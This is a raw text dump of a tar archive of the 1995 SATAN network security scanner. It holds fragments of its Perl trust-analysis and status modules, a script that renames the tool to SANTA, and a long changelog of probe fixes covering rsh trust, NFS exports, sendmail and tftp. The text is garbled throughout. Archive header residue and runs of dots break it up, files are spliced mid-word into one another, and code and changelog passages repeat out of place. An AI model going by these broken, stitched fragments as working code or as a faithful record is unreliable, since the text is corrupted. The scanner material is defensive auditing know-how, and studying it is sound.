# get the last access time for this host. Use numerical form for easy sorting. # sub get_host_time { .local($host) = @_; .return $all_hosts{$host}{'time'}; } 1; = 0; } # # ping a list of hosts and find out what hosts are alive. # sub check_alive { .local ($host); .if ($check_alive_list eq "") { ..return; .} .print "Check-pulse: $check_alive_list\n" if $debug; .# .# Cheat when ICMP is brokesatan-1.1.1/perl/trust.pl........................................................................... 600 . 465 . 506 . 6025 5742457004 10363. .......................................................................... ................................................................................................................................................................................................................................................................. .........................# # update_trust - maintain trust statistics # # Output to: # # $total_trusted_count{host} number of non-ANY trust relationships # $total_trusted_names{host} names of trusted hosts # # $total_trustee_count{host} number of non-ANY trust relationships # $total_trustee_names{host} names of trustee hosts # # $trust_host_type{trusted trustee}{type} all facts about this relationship. # $trust_type_host{type}{trusted trustee} all facts about this relationship. # $trust_files = "rules/trust"; $trust_other = "other"; sub build_update_trust { local($files) = @_; local($code, $type); $code = ' sub update_trust { local($td_host, $te_host); ($td_host = $trusted) =~ s/(.*@)?(.*)/$2/; ($te_host = $trustee) =~ s/(.*@)?(.*)/$2/; return .if $td_host eq "" || $te_host eq "" .|| $td_host eq "ANY" || $td_host eq $te_host; if (!exists($trust_host_type{"$td_host $te_host"})) { .$total_trustee_names{$td_host} .= "$te_host "; .$total_trustee_count{$td_host}++; .$total_trusted_names{$te_host} .= "$td_host "; .$total_trusted_count{$te_host}++; } '; foreach $file (split(/\s+/, $files)) { .open(RULES, $file) || die "cannot open $file: $!"; .while (<RULES>) { . chop; . while (/\\$/) { ..chop; ..$_ .= <RULES>; ..chop; . } . s/#.*$//; . s/\s+$//; . next if /^$/; . s/@/\\@/g; . ($cond, $type) = split(/\t+/, $_, 2); . die "missing trust type" if $type eq ""; . $code .= "\ if ($cond) { .\$trust_host_type{\"\$td_host \$te_host\"}{\"$type\"} .= \$_ . \"\\n\"; .\$trust_type_host{\"$type\"}{\"\$td_host \$te_host\"} .= \$_ . \"\\n\"; .return; }\ "; .} .close(RULES); } $code .= "\ \$trust_host_type{\"\$trustee \$trusted\"}{\"other\"} .= \$_ . \"\\n\"; \$trust_type_host{\"other\"}{\"\$trustee \$trusted\"} .= \$_ . \"\\n\"; }\n"; return $code; } # # Reset all trust information tables. # sub clear_trust_info { .%total_trust_pair = (); .%total_trustee_names = (); .%total_trustee_count = (); .%total_trusted_names = (); .%total_trusted_count = (); .%trust_host_type = (); } # # Some scaffolding for stand-alone operation # if ($running_under_satan) { eval &build_update_trust($trust_files); die "error in $trust_files: $@" if $@; } else { $running_under_satan = -1; $debug = 1; require 'perl/misc.pl'; # # Generate code from rules files. # $code = &build_update_trust($trust_files); print "Code generated from $trust_files:\n\n"; print $code; eval $code; die "error in $trust_files: $@" if $@; # # Apply rules. # print "\nApplying rules to all SATAN records...\n"; while (<>) { chop; if (&satan_split($_) == 0) { &update_trust($_); } } print "Trusted Trustee Type...\n"; for $pair (sort keys %trust_host_type) { .print $pair,' ',sort(join(' ', keys %{$trust_host_type{$pair}})),"\n"; } print "\nType Trusted Trustee...\n"; for $type (sort keys %trust_type_host) { .for $pair (sort keys %{$trust_type_host{$type}}) { . print "$type $pair\n"; .} } } 1; intain trust statistics # # Output to: # # $total_trusted_count{host} number of non-ANY trust relationships # $total_trusted_names{host} names of trusted hosts # # $total_trustee_count{host} number of non-ANY trust relationships # $total_trustee_names{host} names of trustee hosts # # $trust_host_type{trusted trustee}{type} all facts about this relationship. # $trust_type_host{type}{trusted trustee} all facts about this relationship. # $trust_files = "rules/trust"; $trust_other = "othsatan-1.1.1/perl/status.pl.......................................................................... 600 . 465 . 506 . 1126 5742457004 10522. .................................................................................. ................................................................................................................................................................................................................................................................. .................# # Maintain time, date, satan status file and GUI feedback. # require 'perllib/ctime.pl'; require $SATAN_CF; # # Convert to time of day. # sub hhmmss { .local($time) = @_; .local($sec, $min, $hour); . .($sec, $min, $hour) = localtime($time); .return sprintf "%02d:%02d:%02d", "$hour", "$min", "$sec"; } sub update_status { .local($text) = @_; .$now = &hhmmss(time()); .# GUI feedback. .print CLIENT "$now $text<br>\n" if $running_from_html; .# Status file. .die "Can't open status file $status_file\n" ..unless open(STATUS, ">>$status_file"); .print STATUS "$now $text\n"; .close STATUS; } code = ' sub update_trust { local($td_host, $te_host); ($td_host = $trusted) =~ s/(.*@)?(.*)/$2/; ($te_host = $trustee) =~ s/(.*@)?(.*)/$2/; return .if $td_host eq "" || $te_host eq "" .|| $td_host eq "ANY" || $td_host eq $te_host; if (!exists($trust_host_type{"$td_host $te_host"})) { .$total_trustee_names{$td_host} .= "$te_host "; .$total_trustee_count{$td_host}++; .$total_trusted_names{$te_host} .=satan-1.1.1/repent.................................................................................. 700 . 465 . 506 . 2316 5734764650 7134. ................................................................... ................................................................................................................................................................................................................................................................. ................................: # # Change SATAN to SANTA. Do this *before* you type make... # # version 1, Fri Mar 24 2:25:29 1995, last mod by zen # # if we see an md5 file, we'll assume they have already done a make... if test -f bin/md5 ; then .echo Run this before doing a \"make\", or run \"make clean\" and then run it... .exit 1 .fi # # Change the file names from "*satan*" ==> "*santa*" echo Finding all the file names find . \! -name "satan*.gif" -print | while read old_name .do .new_name=`echo $old_name | sed 's/satan/santa/'` .if test $new_name != $old_name ; then ..mv $old_name $new_name ..fi .done # # Nuke the inline and acronym stuff in everything but the binaries... echo Now changing all "SATAN" occurances to "SANTA"... please wait... find . -type f \! -name "*.gif" -print | .grep -v see_the_light.pl | xargs \ .perl -pi -e 's/SATAN/SANTA/g; s/satan/santa/g; s/Security Administrator Tool for Analyzing Networks/Security Analysis Network Tool for Administrators/' echo linking santa... ln html/images/santa.gif html/images/santa-almost-full.gif ln html/images/santa.gif html/images/santa-full.gif # # one last switch... perl -pi -e 's/"SANTA"/"SATAN"/; s/you can run the/but you shouldnt have run the/' html/name.html echo Done! .chop; ..$_ .= <RULES>; ..chop; . } . s/#.*$//; . s/\s+$//; . next if /^$/; . s/@/\\@/g; . ($cond, $type) = split(/\t+/, $_, 2); . die "missing trust type" if $type eq ""; . $code .= "\ if ($cond) { .\$trust_host_type{\"\$td_host \$te_host\"}{\"$type\"} .= \$_ . \"\\n\"; .\$trusatan-1.1.1/Changes................................................................................. 600 . 465 . 506 . 40136 5742520760 7217. ............................................................................................... ................................................................................................................................................................................................................................................................. ....1.1.1 - URL filter was too strict, would reject names with () in them. 1.1 - bundled in ctime.pl and getopts.pl from the perllib. - trouble shooting docs now integrated with FAQ, and a full week of feedback processed into FAQ and troubkle entries. - added a 13th vulnerability page. Irony has it that SATAN is the subject. Surprise: CERT/CC posts advisory *before* a software update is available. - SATAN now detects that HTML clients reveal parent URL information. - eliminated extraneous ping probes. - strerror() is provided whether or not the compiler understands ANSI. - prevent compiler warnings about "& before array" in rpcgen output. - use waitpid() to find out when the HTML browser terminates. - moved 'require getopts.pl' down in bin/*.satan scripts. - fixed typos/errors/omissions/ambiguities in the documentation. - the -c option now changes individual perl variables. Example: -c "dont_use_nslookup = 1; dont_use_icmp = 1". Useful for config variables that have no command-line option. - dropped the -c alternate config file feature. There is no easy way to both set *and* override defaults (short of writing our own getopt). - getfqdn() could be blind for nameless hosts when nslookup was enabled. - getfqdn() would be blind for nameless hosts when nslookup was disabled. - rsh test no longer relies on the rsh or remsh command (it worked only when the target account exists on the probing host), and it now makes difference between "host trusts everyone" and "account trusts everyone". It would claim that hosts are open when they refuse access with a tcp wrapper banner message. - append dot in dns.satan query to avoid spurious name servers being listed. This also may make things faster. - avoid duplicate "exports to the world" message (shut up showmount message when running from an untrusted host). - added HTML client address check, in case the magic cookie leaks out. This is just a last barrier; cookies should never be disclosed. - added URL name address check, in case the magic cookie leaks out. This is just a last barrier; cookies should never be disclosed. - added an ANSI/POSIXized version of the rpcgen command for systems without one (ultrix, some sysv4 versions). - more Linux support. There are many Linux versions so who knows where this will work. - rsh tests are now executed only when the probing host is untrusted. - avoid duplicate tftp problem message by making it different for read and write. 1.0! We made it! - just in case, dropped TUE references from all code except safe_finger (which was stolen from the TCP wrapper) and the admin guide (which was already posted one year ago with TUE reference in it). - dropped the unused rcmdinfo tool. - linked the troubleshooting guide. - deleted all references to set-uid tools - scripts cannot be made setuid. - added note about parallel runs to the satan.8 man page. - will ask the user to set $dont_use_dns when nslookup fails. - README & TODO - added disclaimer on parallelism; added AFS & SNMP to our TODO list. - rm'd fireup - added proxy stuff to README and troubleshooting.html 0.93 - minor typos in the documentation keep popping up... - worked around a sys_errlist[] declaration clash in freebsd 2.0. - changed references to "session key" to "magic cookie". - fixed "back to.." link in the system requirements. - gave the session key writeup a more architectural tone. - fixed another duplicate filtering bug in danger report. - SATAN no longer dies (undefined host) when given an incomplete database. - clearer distinction of in-core and on-disk databases, and what happens when you load/merge/open/query them. - fixed some typos in the FAQ. - commented out offending commands in satan.ps - fixed some typos in sendmail check. 0.91 - docs: user_interface, the_main_parts, satan_reference, satan_overview, satan.db, FAQ (incl. adding your stuff to FAQ) - rules - 2 more sendmail checks - (<= 5.60), (<=5.65 && dynix) in facts, improved DYNIX recognition - changed tutorial Sendmail_vulnerabilities.html 0.90 - more consistency (use of SATAN logo, intermediate headings). - broke down documentation into overview and reference. - fixed some dead links (_ instead of -). - figured out why lynx would not start up a problm. - put back in old/new satan.ps - writable-FTP tutorial - added cert link - reconfig - changed error msg to be more clear - minor changes to README - minor grammar and spelling changes to satan.8 - Changed several docs - clarity, expansion, etc. - put in the troubleshooting.html guide - figured out why nfs-chk/yp-chk had trouble with Solaris. - cloned nfs-chk.satan to yp-chk.satan for nis map accessibility test. - added -d (domain name) option to ypbind.satan. - cloned nfs-chk to yp-chk and plugged in an YP client call. - Linux users are now instructed to copy BSD includes into the satan tree. - found the nfs ghost - missing initialization in dynamic page. - why tcpscan was too quick claimin telnet on non-std port. - added <HTML><HEAD><BODY> to the dynamic HTML pages. - consistent spelling of names (caps). - copied the alpha satan.ps, the ./satan.ps was busted. - changed font in acknowledgements from fixed width to something more palatable. - bold faced our names in authors.html - fixed satan => SATAN in satan.8 - added satan.ps - modified/added to html/docs/FAQ.html (red 'n' black dot controversy on a B/W screen, changing HTML viewers, etc.) - mv'd html/docs/admin_guide_to_cracking => $!.html - changed a link in html/docs/references.html to above - changed html/docs/user_interface.html to have ALT's to dots - put a <HTML>, <HEAD>, and <BODY> into html/docs/*.html, and in html/tutorials/vulnerability/*, also added some "ALT=..." - put in (identical) warnings about tcp-wrappers/reverse fingers, in running for the first time tutorial and general usage docs. - nuked the glossary - no time to finish it right. - Nuked *.orig, *.bak, *.old - satan ships with execute bits off, to avoid stupid questions from people that did not run `reconfig' first, as described in the README file. - debugging mode is now off by default. You can tail -f the status_file to watch progress. - added a first README file to get people started. - workaround for Solaris broken naming service (no cname to offical name) - added a few more names to the acknowledgements, fixed the simple-minded "sort +1" that sorted on second name instead of last name. - in vulnerability tutorials, moved admin-guide links under the "other tips". - in the modem vulnerability tutorial, the phone bill went to the wrong party. - added sys/select.h includes for AIX. - now sorts subnets numerically - acknowledgements - put in the modem check... I hope this regex doesn't match anything else by mistake! (This is in rules/facts) I'm making it a "root" severity problem, just because it's so ghastly, more than it being such a severe problem on that host. - fixed tftp to get /etc/group instead of /etc/passwd - html/docs/satan_doc.pl - added trust section - html/docs/trust.html - discussion of trust - fixed names in satan.8 - fixed my personal statement - FIXED (!!!) back the satan control panel. Data management should NOT go first. - fixed grammar html/tutorials/vulnerability/REXD_access - uncommented root rsh and SGI rsh as guest - reconfig - add whoami - uncommented FAQ; still needs lots of work! - made links from tutorials to admin-guide-to-cracking - now show the current database name in the "open database" text field. - added -u (running from untrusted host) option and $untrusted variable. - changed wording of worldwide exports in nfs-chk.satan - moved umask 077 to main satan - tcpscan now continues after ICMP_UNREACH_NET or ICMP_UNREACH_PROTOCOL. - network targets didn't work anymore. - added "view primary target results" link. - target acq screen: added explanation of "normal" and "heavy" scans. - trust reports now sort by trust type as default. - added -A (proximity descent) and -z (sub zero proximity) options. - used wrong hostname variable in sort-by-trust-type reports. - dropped proximity stuff from the target acquisition screen. - fixed references to old timeout variable names in the admin html pages. - more trust classification rules. - added ';' after shell built-ins in Makefile (for HP-UX make). Satan beta 0.5 - rescan is now default: before scanning, SATAN always drops old information on primary hosts. Too many problems with todo rules being skipped at a low attack level, and never being triggered again whe the attack level was increased. - wrote a UNIX man page so we can tell them to Read the fine manual. - data mgt moved to the top - if you collect data first it does not make sense to change databases later. - added "back to SATAN report analysis" links to the report screens. - worked around strange behavior when host or domain names end in au. fix: all dynamic URLs now end in a comma. - some error screens had a non-standard layout. - replacing TYPE=NAME by TYPE="name" made things work better with Mosaic. - tcp_scan will calm down when the kernel runs out of file descriptors. - fixed extraneous Add-fact/todo/target messages in verbose logs. - fixed defective duplicate filter in danger level report. - added OSF to the list of mainstream systems (weird...) - save database to temp files, then rename. This avoids data loss when the program is interrupted while saving. We should append new stuff only but I'm not going to change the inference engine in the last hour before the final beta. - all shell commands go through one routine so nothing escapes timeouts. - added SONY NEWS machines to hosttype, fixed apple type, now picks up BSDI OS version - added an AUTHOR file in src/fping, to point to the current maintainer. - fixed reconfig to not look at dirs that don't exist, echo correct message, look for remsh & if it exists, use it instead of rsh. Changed top line to be a better way (you might check this out; this was suggested by tom christianson & larry wall, so I trust it.) - changed the satan.probes.html documentation significantly; minor change to satan_documentation to reflect this. - added grep into paths.sh - moved data management menu item below targeting and results on main control panel (html/satan.pl) - I really want to have targeting first, then analysis, then the rest! - created a wu-archive ftp tutorial - small change in analysis.pl; "Widely" seems redundant, nuked it. - added question about multiple fingers to FAQ - not scanned hosts are now called "not scanned" instead of "unknown type". - added sort-by-trust-type links to the trusted and trusting host displays - documented the trust rule base. - fixed typo in trusting host sort order. - restored control panel order: choose data base before collecting data. - port scanners now take service names from config/services so that our inference rules will be more robust. The system services tables are used for everything not found in SATAN's service tables. - began cleaning up the html. Combining both quoting and italics on the same word is just too much. - some hosts would stay "unknown type" after rescanning. Fix: add an UNKNOWN pattern to rules/hosttype that matches both "" and "unknown type". - deleted the html/query subdirectory - SATAN now maintains a per-host last access time, displayed with host details. - faux-fping took only one argument and always did subnet expansion. I replaced it by an fping-compatible one-liner. - updated docs about current locations of files. - subtle bugs eliminated by using explicit loop controls instead of $_. - subnet expansion did not update attack levels of already known hosts. - reconfig no longer needs to have #!/path/to/perl. - get_targets moved to bin. - fixed rsh.satan to not depend on remote location of commands - can now merge data bases (GUI only). - fix_hostname.pl could map IP addresses to unqualified hostnames. - SATAN could skip hosts that were dead on a previous run. - added support to rescan primary hosts (ignore old primary host results). - added -o option for 'scan only these'. - added -O option for 'skip these'. - added -c option for alternate config file. Satan 0.40 beta: - slightly changed -V flag to satan; prints out version, found in version.pl - removed *box*.gif *triangle*.gif from images directory - removed all but black, red, pink, and purple dots from dots dir - swept through all html files with a fairly fine-toothed comb and programs, fixed all syntax errors that I could find. This is mostly, actually, the html/docs & html/tutorials dirs.removed "lines" subdirectory - all tool etc. file names are now controlled from config files. - now handles combinations of `scan only these' and `don't scan' exceptions. - now accepts multiple exceptions for `scan only these' and `don't scan'. - configuration GUI screen now shows current exception patterns. - syntax of exeption patterns changed from regexps to shell style. it was symply too painful to get right. - config file edit script used the raw HTML attribute list with %hex codes. - generic editing of %hex codes emitted by web viewers. - GUI will now show a trace (with time stamps) of what satan is doing. - configurable pathnames in sh scripts moved to central file. - lots of dead links in the docs fixed. - big one: separate directories for config, commands, rules, scripts. - added "make setuid" target to the main Makefile. - status file is now updated when satan terminates. - status file cannot be specified on the command line (for parallel runs). Satan 0.36 beta: - added "continue with report and analysis" link to data management. - added a rules/trust file to classify trust relationships by type. - put back the "widely trusting hosts" link in the report table of contents. - added a $dont_use_ping flag (config file, docs and GUI) so you can make SATAN believe that hosts are always reachable. Satan 0.34 beta: - print an error when get_targets fails instead of mysteriously terminating. - all hostnames should now be translated to lowercase - zap all prixy environment variables except no_proxy. - numerical $dont_attack_these and $only_attack_these patterns now work. - the boot.satan will now fire only when the client hostname resolves - DNS: added a $dont_use_nslookup flag (config file, docs and GUI). - made the rpcinfo tool more accurate. - use safe_finger instead of plain finger (thanks Lionel). - updated the documentation (fping is bundled, attack level probe lists). - fixed some list problems that Mosaic could choke on. - re-wrote the satan.cf attack level lists as per Lionel's suggestion. This makes the portscanner implementation much cleaner. Tools are now listed _with_ arguments, so no more automatic ".satan" tricks. - rules.services claimed all gopher or www servers on non-standard ports. - fixed output flushing in *.satan tools. Satan 0.33 beta: - minor portscan.satan fix (will rewrite this according to Lionel's suggestion). - more reconfig fixes (would replace perl5 by perl55) - more shell command filtering - fixed timeout order in satan script - portability fixes for the tcp/udp port scanner (hp-ux) Satan 0.3 beta: - found why SATAN would no longer look up the host IP of unprobed hosts. - Doesn't die when reading malformed data - slight fix to nfs-chk.satan - cleaned up some html stuff/dead links - Added a test for pre 2.4 wustl ftp servers - Ever so small correction to reconfig... (I'm going to rewrite this in perl.) Satan 0.2 beta: - will now tell via the GUI how many hosts were visited. - GUI now shows status (unreachable) and scanning level info in the per-host report. - fixed the reconfig script so it won't mangle perl path names anymore - will now tell you to become root or to make fping, tcp_scan etc. set-uid. - added a -V (version) command-line option. Unfortunately, PERL still dumps core on IRIX 5.3 when SATAN is given a command-line option. - added a $running_under_html flag for GUI diagnostics Satan 0.1 beta: - fping is now completely integrated with satan. - better support of recursive `make -n'. - queries by host now support FQDN completion. - several broken html links fixed. - final solution for the sys/socket.ph problem. - Web client will now connect to hostname instead of 127.0.0.1. - nfs-chk tries both privileged and unprivileged client ports in the same run. - cleanup nslookup [x.x.x.x] result when cannot find a host. moved all but black, red, pink, and purple dots from dots dir - swept through all html files with a fairly fine-toothed comb and programs, fixed all syntax errors that I could find. This is mostly, actually, the html/docs & html/tutorials dirs.removed "lines" subdirectory - all tool etc. file names are now controlled from config files. - now handles combinations of `scan only these' and `don't scan' exceptions...................................................................................................................................................................................... ................................................................................................................................................................................................................................................................. ................................................................................................................................................................................................................................................................. ................................................................................................................................................................................................................................................................. .......................................................................m that hosts are open when they refuse access with a tcp wrapper banner message. - append dot in dns.satan query to avoid spurious name servers being listed. This also may make things faster. - avoid duplicate "exports to the world" message (shut up showmount message when running from an untrusted host). - added HTML client address check, in case the magic cookie leaks out. This is just a last barrier; cookies should never be disclosed. - added URL name address check, in case the magic cookie leaks out. This is just a last barrier; cookies should never be disclosed. - added an ANSI/POSIXized version of the rpcgen command for systems without one (ultrix, some sysv4 versions). - more Linux support. There are many Linux versions so who knows where this will work. - rsh tests are now executed only when the probing host is untrusted. - avoid duplicate tftp problem message by making it different for read and write. 1.0! We made it! - just in case, dropped TUE references from all code except safe_finger (which was stolen from the TCP wrapper) and the admin guide (which was already posted one year ago with TUE reference in it). - dropped the unused rcmdinfo tool. - linked the troubleshooting guide. - deleted all references to set-uid tools - scripts cannot be made setuid. - added note about parallel runs to the satan.8 man page. - will ask the user to set $dont_use_dns when nslookup fails. - README & TODO - added disclaimer on parallelism; added AFS & SNMP to our TODO list. - rm'd fireup - added proxy stuff to README and troubleshooting.html 0.93 - minor typos in the documentation keep popping up... - worked around a sys_errlist[] declaration clash in freebsd 2.0. - changed references to "session key" to "magic cookie". - fixed "back to.." link in the system requirements. - gave the session key writeup a more architectural tone. - fixed another duplicate filtering bug in danger report. - SATAN no longer dies (undefined host) when given an incomplete database.